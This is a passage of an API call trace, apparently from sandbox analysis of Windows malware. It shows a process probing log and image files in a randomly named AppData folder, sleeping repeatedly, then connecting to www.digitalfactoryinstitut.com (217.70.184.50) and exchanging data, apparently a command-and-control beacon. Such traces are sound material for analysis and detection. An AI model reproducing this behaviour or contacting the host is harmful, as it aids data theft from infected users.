ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.962] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.962] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac8700) returned 1 [0189.962] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.962] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.962] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.962] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac95a0) returned 1 [0189.962] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.962] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.962] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.962] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac97e0) returned 1 [0189.962] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.962] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.963] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.963] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac91b0) returned 1 [0189.963] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.963] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.963] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.963] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac97e0) returned 1 [0189.963] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.963] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.963] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.963] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac83a0) returned 1 [0189.963] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.963] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.963] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.963] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac8c10) returned 1 [0189.963] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.963] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.963] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0189.963] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac95a0) returned 1 [0189.963] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.963] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.963] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0189.963] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x4ac91b0) returned 1 [0189.964] Sleep (dwMilliseconds=0x7d0) [0189.965] Sleep (dwMilliseconds=0x7d0) [0189.967] Sleep (dwMilliseconds=0x7d0) [0189.969] Sleep (dwMilliseconds=0x7d0) [0189.970] Sleep (dwMilliseconds=0x7d0) [0189.972] Sleep (dwMilliseconds=0x7d0) [0189.974] Sleep (dwMilliseconds=0x7d0) [0189.975] Sleep (dwMilliseconds=0x7d0) [0189.977] Sleep (dwMilliseconds=0x7d0) [0189.978] Sleep (dwMilliseconds=0x7d0) [0189.980] Sleep (dwMilliseconds=0x7d0) [0189.981] Sleep (dwMilliseconds=0x7d0) [0189.983] Sleep (dwMilliseconds=0x7d0) [0189.984] Sleep (dwMilliseconds=0x7d0) [0189.986] Sleep (dwMilliseconds=0x7d0) [0189.987] Sleep (dwMilliseconds=0x7d0) [0189.989] Sleep (dwMilliseconds=0x7d0) [0189.991] Sleep (dwMilliseconds=0x7d0) [0189.992] Sleep (dwMilliseconds=0x7d0) [0189.994] Sleep (dwMilliseconds=0x7d0) [0189.995] Sleep (dwMilliseconds=0x7d0) [0189.997] Sleep (dwMilliseconds=0x7d0) [0189.998] Sleep (dwMilliseconds=0x7d0) [0190.001] Sleep (dwMilliseconds=0x7d0) [0190.003] Sleep (dwMilliseconds=0x7d0) [0190.004] Sleep (dwMilliseconds=0x7d0) [0190.006] Sleep (dwMilliseconds=0x7d0) [0190.007] Sleep (dwMilliseconds=0x7d0) [0190.009] Sleep (dwMilliseconds=0x7d0) [0190.011] Sleep (dwMilliseconds=0x7d0) [0190.013] Sleep (dwMilliseconds=0x7d0) [0190.015] Sleep (dwMilliseconds=0x7d0) [0190.016] Sleep (dwMilliseconds=0x7d0) [0190.018] Sleep (dwMilliseconds=0x7d0) [0190.019] Sleep (dwMilliseconds=0x7d0) [0190.021] Sleep (dwMilliseconds=0x7d0) [0190.022] Sleep (dwMilliseconds=0x7d0) [0190.024] Sleep (dwMilliseconds=0x7d0) [0190.025] Sleep (dwMilliseconds=0x7d0) [0190.027] Sleep (dwMilliseconds=0x7d0) [0190.028] Sleep (dwMilliseconds=0x7d0) [0190.030] Sleep (dwMilliseconds=0x7d0) [0190.031] Sleep (dwMilliseconds=0x7d0) [0190.033] Sleep (dwMilliseconds=0x7d0) [0190.036] Sleep (dwMilliseconds=0x7d0) [0190.038] Sleep (dwMilliseconds=0x7d0) [0190.039] Sleep (dwMilliseconds=0x7d0) [0190.041] Sleep (dwMilliseconds=0x7d0) [0190.042] Sleep (dwMilliseconds=0x7d0) [0190.044] Sleep (dwMilliseconds=0x7d0) [0190.046] Sleep (dwMilliseconds=0x7d0) [0190.048] Sleep (dwMilliseconds=0x7d0) [0190.050] Sleep (dwMilliseconds=0x7d0) [0190.051] Sleep (dwMilliseconds=0x7d0) [0190.053] Sleep (dwMilliseconds=0x7d0) [0190.054] Sleep (dwMilliseconds=0x7d0) [0190.057] Sleep (dwMilliseconds=0x7d0) [0190.059] Sleep (dwMilliseconds=0x7d0) [0190.061] Sleep (dwMilliseconds=0x7d0) [0190.062] Sleep (dwMilliseconds=0x7d0) [0190.064] Sleep (dwMilliseconds=0x7d0) [0190.065] Sleep (dwMilliseconds=0x7d0) [0190.067] Sleep (dwMilliseconds=0x7d0) [0190.068] Sleep (dwMilliseconds=0x7d0) [0190.070] Sleep (dwMilliseconds=0x7d0) [0190.071] Sleep (dwMilliseconds=0x7d0) [0190.073] Sleep (dwMilliseconds=0x7d0) [0190.074] Sleep (dwMilliseconds=0x7d0) [0190.076] Sleep (dwMilliseconds=0x7d0) [0190.079] Sleep (dwMilliseconds=0x7d0) [0190.080] Sleep (dwMilliseconds=0x7d0) [0190.082] Sleep (dwMilliseconds=0x7d0) [0190.083] Sleep (dwMilliseconds=0x7d0) [0190.085] Sleep (dwMilliseconds=0x7d0) [0190.086] Sleep (dwMilliseconds=0x7d0) [0190.088] Sleep (dwMilliseconds=0x7d0) [0190.090] Sleep (dwMilliseconds=0x7d0) [0190.092] Sleep (dwMilliseconds=0x7d0) [0190.093] Sleep (dwMilliseconds=0x7d0) [0190.095] Sleep (dwMilliseconds=0x7d0) [0190.096] Sleep (dwMilliseconds=0x7d0) [0190.098] Sleep (dwMilliseconds=0x7d0) [0190.099] Sleep (dwMilliseconds=0x7d0) [0190.101] Sleep (dwMilliseconds=0x7d0) [0190.102] Sleep (dwMilliseconds=0x7d0) [0190.104] Sleep (dwMilliseconds=0x7d0) [0190.105] Sleep (dwMilliseconds=0x7d0) [0190.107] Sleep (dwMilliseconds=0x7d0) [0190.108] Sleep (dwMilliseconds=0x7d0) [0190.111] Sleep (dwMilliseconds=0x7d0) [0190.113] Sleep (dwMilliseconds=0x7d0) [0190.115] Sleep (dwMilliseconds=0x7d0) [0190.116] Sleep (dwMilliseconds=0x7d0) [0190.118] Sleep (dwMilliseconds=0x7d0) [0190.119] Sleep (dwMilliseconds=0x7d0) [0190.122] Sleep (dwMilliseconds=0x7d0) [0190.124] Sleep (dwMilliseconds=0x7d0) [0190.126] Sleep (dwMilliseconds=0x7d0) [0190.127] Sleep (dwMilliseconds=0x7d0) [0190.129] Sleep (dwMilliseconds=0x7d0) [0190.130] Sleep (dwMilliseconds=0x7d0) [0190.132] Sleep (dwMilliseconds=0x7d0) [0190.135] Sleep (dwMilliseconds=0x7d0) [0190.137] Sleep (dwMilliseconds=0x7d0) [0190.138] Sleep (dwMilliseconds=0x7d0) [0190.140] Sleep (dwMilliseconds=0x7d0) [0190.141] Sleep (dwMilliseconds=0x7d0) [0190.143] Sleep (dwMilliseconds=0x7d0) [0190.145] Sleep (dwMilliseconds=0x7d0) [0190.146] Sleep (dwMilliseconds=0x7d0) [0190.148] Sleep (dwMilliseconds=0x7d0) [0190.151] Sleep (dwMilliseconds=0x7d0) [0190.152] Sleep (dwMilliseconds=0x7d0) [0190.155] Sleep (dwMilliseconds=0x7d0) [0190.157] Sleep (dwMilliseconds=0x7d0) [0190.158] Sleep (dwMilliseconds=0x7d0) [0190.160] Sleep (dwMilliseconds=0x7d0) [0190.161] Sleep (dwMilliseconds=0x7d0) [0190.163] Sleep (dwMilliseconds=0x7d0) [0190.164] Sleep (dwMilliseconds=0x7d0) [0190.182] Sleep (dwMilliseconds=0x7d0) [0190.183] Sleep (dwMilliseconds=0x7d0) [0190.185] Sleep (dwMilliseconds=0x7d0) [0190.187] Sleep (dwMilliseconds=0x7d0) [0190.188] Sleep (dwMilliseconds=0x7d0) [0190.190] Sleep (dwMilliseconds=0x7d0) [0190.191] Sleep (dwMilliseconds=0x7d0) [0190.193] Sleep (dwMilliseconds=0x7d0) [0190.197] Sleep (dwMilliseconds=0x7d0) [0190.199] Sleep (dwMilliseconds=0x7d0) [0190.202] Sleep (dwMilliseconds=0x7d0) [0190.204] Sleep (dwMilliseconds=0x7d0) [0190.205] Sleep (dwMilliseconds=0x7d0) [0190.207] Sleep (dwMilliseconds=0x7d0) [0190.210] Sleep (dwMilliseconds=0x7d0) [0190.245] Sleep (dwMilliseconds=0x7d0) [0190.247] Sleep (dwMilliseconds=0x7d0) [0190.248] Sleep (dwMilliseconds=0x7d0) [0190.251] Sleep (dwMilliseconds=0x7d0) [0190.252] Sleep (dwMilliseconds=0x7d0) [0190.254] Sleep (dwMilliseconds=0x7d0) [0190.255] Sleep (dwMilliseconds=0x7d0) [0190.257] Sleep (dwMilliseconds=0x7d0) [0190.258] Sleep (dwMilliseconds=0x7d0) [0190.260] Sleep (dwMilliseconds=0x7d0) [0190.261] Sleep (dwMilliseconds=0x7d0) [0190.263] Sleep (dwMilliseconds=0x7d0) [0190.264] Sleep (dwMilliseconds=0x7d0) [0190.266] Sleep (dwMilliseconds=0x7d0) [0190.267] Sleep (dwMilliseconds=0x7d0) [0190.270] Sleep (dwMilliseconds=0x7d0) [0190.272] Sleep (dwMilliseconds=0x7d0) [0190.274] Sleep (dwMilliseconds=0x7d0) [0190.275] Sleep (dwMilliseconds=0x7d0) [0190.277] Sleep (dwMilliseconds=0x7d0) [0190.278] Sleep (dwMilliseconds=0x7d0) [0190.280] Sleep (dwMilliseconds=0x7d0) [0190.281] Sleep (dwMilliseconds=0x7d0) [0190.283] Sleep (dwMilliseconds=0x7d0) [0190.284] Sleep (dwMilliseconds=0x7d0) [0190.286] Sleep (dwMilliseconds=0x7d0) [0190.287] Sleep (dwMilliseconds=0x7d0) [0190.289] Sleep (dwMilliseconds=0x7d0) [0190.290] Sleep (dwMilliseconds=0x7d0) [0190.292] Sleep (dwMilliseconds=0x7d0) [0190.293] Sleep (dwMilliseconds=0x7d0) [0190.295] Sleep (dwMilliseconds=0x7d0) [0190.296] Sleep (dwMilliseconds=0x7d0) [0190.298] Sleep (dwMilliseconds=0x7d0) [0190.299] Sleep (dwMilliseconds=0x7d0) [0190.301] Sleep (dwMilliseconds=0x7d0) [0190.302] Sleep (dwMilliseconds=0x7d0) [0190.304] Sleep (dwMilliseconds=0x7d0) [0190.305] Sleep (dwMilliseconds=0x7d0) [0190.307] Sleep (dwMilliseconds=0x7d0) [0190.308] Sleep (dwMilliseconds=0x7d0) [0190.310] Sleep (dwMilliseconds=0x7d0) [0190.311] Sleep (dwMilliseconds=0x7d0) [0190.313] Sleep (dwMilliseconds=0x7d0) [0190.314] Sleep (dwMilliseconds=0x7d0) [0190.316] Sleep (dwMilliseconds=0x7d0) [0190.317] Sleep (dwMilliseconds=0x7d0) [0190.319] Sleep (dwMilliseconds=0x7d0) [0190.320] Sleep (dwMilliseconds=0x7d0) [0190.322] Sleep (dwMilliseconds=0x7d0) [0190.323] Sleep (dwMilliseconds=0x7d0) [0190.325] Sleep (dwMilliseconds=0x7d0) [0190.326] Sleep (dwMilliseconds=0x7d0) [0190.328] Sleep (dwMilliseconds=0x7d0) [0190.329] Sleep (dwMilliseconds=0x7d0) [0190.331] Sleep (dwMilliseconds=0x7d0) [0190.333] Sleep (dwMilliseconds=0x7d0) [0190.334] Sleep (dwMilliseconds=0x7d0) [0190.336] Sleep (dwMilliseconds=0x7d0) [0190.337] Sleep (dwMilliseconds=0x7d0) [0190.339] Sleep (dwMilliseconds=0x7d0) [0190.341] Sleep (dwMilliseconds=0x7d0) [0190.342] Sleep (dwMilliseconds=0x7d0) [0190.363] Sleep (dwMilliseconds=0x7d0) [0190.365] Sleep (dwMilliseconds=0x7d0) [0190.366] Sleep (dwMilliseconds=0x7d0) [0190.368] Sleep (dwMilliseconds=0x7d0) [0190.369] Sleep (dwMilliseconds=0x7d0) [0190.371] Sleep (dwMilliseconds=0x7d0) [0190.372] Sleep (dwMilliseconds=0x7d0) [0190.374] Sleep (dwMilliseconds=0x7d0) [0190.375] Sleep (dwMilliseconds=0x7d0) [0190.377] Sleep (dwMilliseconds=0x7d0) [0190.378] Sleep (dwMilliseconds=0x7d0) [0190.380] Sleep (dwMilliseconds=0x7d0) [0190.381] Sleep (dwMilliseconds=0x7d0) [0190.383] Sleep (dwMilliseconds=0x7d0) [0190.385] Sleep (dwMilliseconds=0x7d0) [0190.386] Sleep (dwMilliseconds=0x7d0) [0190.388] Sleep (dwMilliseconds=0x7d0) [0190.389] Sleep (dwMilliseconds=0x7d0) [0190.391] Sleep (dwMilliseconds=0x7d0) [0190.392] Sleep (dwMilliseconds=0x7d0) [0190.394] Sleep (dwMilliseconds=0x7d0) [0190.396] Sleep (dwMilliseconds=0x7d0) [0190.398] Sleep (dwMilliseconds=0x7d0) [0190.399] Sleep (dwMilliseconds=0x7d0) [0190.401] Sleep (dwMilliseconds=0x7d0) [0190.402] Sleep (dwMilliseconds=0x7d0) [0190.404] Sleep (dwMilliseconds=0x7d0) [0190.405] Sleep (dwMilliseconds=0x7d0) [0190.407] Sleep (dwMilliseconds=0x7d0) [0190.408] Sleep (dwMilliseconds=0x7d0) [0190.410] Sleep (dwMilliseconds=0x7d0) [0190.411] Sleep (dwMilliseconds=0x7d0) [0190.413] Sleep (dwMilliseconds=0x7d0) [0190.415] Sleep (dwMilliseconds=0x7d0) [0190.417] Sleep (dwMilliseconds=0x7d0) [0190.419] Sleep (dwMilliseconds=0x7d0) [0190.455] Sleep (dwMilliseconds=0x7d0) [0190.456] Sleep (dwMilliseconds=0x7d0) [0190.458] Sleep (dwMilliseconds=0x7d0) [0190.460] Sleep (dwMilliseconds=0x7d0) [0190.461] Sleep (dwMilliseconds=0x7d0) [0190.464] Sleep (dwMilliseconds=0x7d0) [0190.465] Sleep (dwMilliseconds=0x7d0) [0190.467] Sleep (dwMilliseconds=0x7d0) [0190.468] Sleep (dwMilliseconds=0x7d0) [0190.470] Sleep (dwMilliseconds=0x7d0) [0190.471] Sleep (dwMilliseconds=0x7d0) [0190.473] Sleep (dwMilliseconds=0x7d0) [0190.474] Sleep (dwMilliseconds=0x7d0) [0190.476] Sleep (dwMilliseconds=0x7d0) [0190.478] Sleep (dwMilliseconds=0x7d0) [0190.479] Sleep (dwMilliseconds=0x7d0) [0190.481] Sleep (dwMilliseconds=0x7d0) [0190.482] Sleep (dwMilliseconds=0x7d0) [0190.484] Sleep (dwMilliseconds=0x7d0) [0190.485] Sleep (dwMilliseconds=0x7d0) [0190.487] Sleep (dwMilliseconds=0x7d0) [0190.488] Sleep (dwMilliseconds=0x7d0) [0190.490] Sleep (dwMilliseconds=0x7d0) [0190.491] Sleep (dwMilliseconds=0x7d0) [0190.493] Sleep (dwMilliseconds=0x7d0) [0190.495] Sleep (dwMilliseconds=0x7d0) [0190.497] Sleep (dwMilliseconds=0x7d0) [0190.499] Sleep (dwMilliseconds=0x7d0) [0190.500] Sleep (dwMilliseconds=0x7d0) [0190.502] Sleep (dwMilliseconds=0x7d0) [0190.503] Sleep (dwMilliseconds=0x7d0) [0190.505] Sleep (dwMilliseconds=0x7d0) [0190.506] Sleep (dwMilliseconds=0x7d0) [0190.508] Sleep (dwMilliseconds=0x7d0) [0190.509] Sleep (dwMilliseconds=0x7d0) [0190.511] Sleep (dwMilliseconds=0x7d0) [0190.512] Sleep (dwMilliseconds=0x7d0) [0190.514] Sleep (dwMilliseconds=0x7d0) [0190.516] Sleep (dwMilliseconds=0x7d0) [0190.552] Sleep (dwMilliseconds=0x7d0) [0190.563] Sleep (dwMilliseconds=0x7d0) [0190.566] Sleep (dwMilliseconds=0x7d0) [0190.568] Sleep (dwMilliseconds=0x7d0) [0190.570] Sleep (dwMilliseconds=0x7d0) [0190.571] Sleep (dwMilliseconds=0x7d0) [0190.572] Sleep (dwMilliseconds=0x7d0) [0190.574] Sleep (dwMilliseconds=0x7d0) [0190.575] Sleep (dwMilliseconds=0x7d0) [0190.577] Sleep (dwMilliseconds=0x7d0) [0190.578] Sleep (dwMilliseconds=0x7d0) [0190.580] Sleep (dwMilliseconds=0x7d0) [0190.582] Sleep (dwMilliseconds=0x7d0) [0190.583] Sleep (dwMilliseconds=0x7d0) [0190.584] Sleep (dwMilliseconds=0x7d0) [0190.586] Sleep (dwMilliseconds=0x7d0) [0190.587] Sleep (dwMilliseconds=0x7d0) [0190.589] Sleep (dwMilliseconds=0x7d0) [0190.590] Sleep (dwMilliseconds=0x7d0) [0190.592] Sleep (dwMilliseconds=0x7d0) [0190.593] Sleep (dwMilliseconds=0x7d0) [0190.595] Sleep (dwMilliseconds=0x7d0) [0190.596] Sleep (dwMilliseconds=0x7d0) [0190.598] Sleep (dwMilliseconds=0x7d0) [0190.599] Sleep (dwMilliseconds=0x7d0) [0190.601] Sleep (dwMilliseconds=0x7d0) [0190.602] Sleep (dwMilliseconds=0x7d0) [0190.604] Sleep (dwMilliseconds=0x7d0) [0190.872] Sleep (dwMilliseconds=0x7d0) [0190.935] socket (af=2, type=1, protocol=6) returned 0x1ec0 [0190.935] getaddrinfo (in: pNodeName="www.digitalfactoryinstitut.com", pServiceName="80", pHints=0x9e755f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e75628 | out: ppResult=0x9e75628*=0xa05e410*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f921f0*(sa_family=2, sin_port=0x50, sin_addr="217.70.184.50"), ai_next=0x0)) returned 0 [0191.005] connect (s=0x1ec0, name=0x9f921f0*(sa_family=2, sin_port=0x50, sin_addr="217.70.184.50"), namelen=16) returned 0 [0191.037] send (s=0x1ec0, buf=0x82e10fa*, len=180, flags=0) returned 180 [0191.038] setsockopt (s=0x1ec0, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0191.038] recv (in: s=0x1ec0, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 3000 [0191.101] closesocket (s=0x1ec0) returned 0 [0191.101] Sleep (dwMilliseconds=0x7d0) [0191.103] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: 